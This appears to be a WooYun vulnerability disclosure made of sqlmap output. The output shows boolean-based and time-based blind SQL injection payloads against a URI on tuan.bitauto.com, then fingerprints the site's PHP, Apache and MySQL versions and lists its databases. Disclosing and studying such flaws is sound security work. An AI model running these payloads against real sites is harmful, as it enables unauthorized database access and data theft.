WooYun.org

sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
---
Place: URI
Parameter: #1*
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: http://tuan.bitauto.com:80/activity/BM-188/20005/2032 AND 9659=9659
    Type: AND/OR time-based blind
    Title: MySQL > 5.0.11 AND time-based blind
    Payload: http://tuan.bitauto.com:80/activity/BM-188/20005/2032 AND SLEEP(5)
---
[22:26:36] [INFO] the back-end DBMS is MySQL
web application technology: PHP 5.3.9, Apache 2.2.23
back-end DBMS: MySQL 5.0.11
[22:26:36] [INFO] fetching database names
[22:26:36] [INFO] fetching number of databases
[22:26:36] [WARNING] running in a single-thread mode. Please consider usage of option '--threads' for faster data retrieval
[22:26:36] [INFO] retrieved: 
[22:26:36] [INFO] heuristics detected web page charset 'ascii'
sqlmap got a 302 redirect to 'http://tuan.bitauto.com:80/errorcity'. Do you want to follow? [Y/n] Y
[22:26:40] [WARNING] reflective value(s) found and filtering out
3
[22:26:44] [INFO] retrieved: information_schema
[22:28:42] [INFO] retrieved: hd_huodong
[22:29:38] [INFO] retrieved: test
available databases [3]:
[*] hd_huodong
[*] information_schema
[*] test
[22:30:05] [INFO] fetched data logged to text files under './output/tuan.bitauto.com'
[*] shutting down at 22:30:05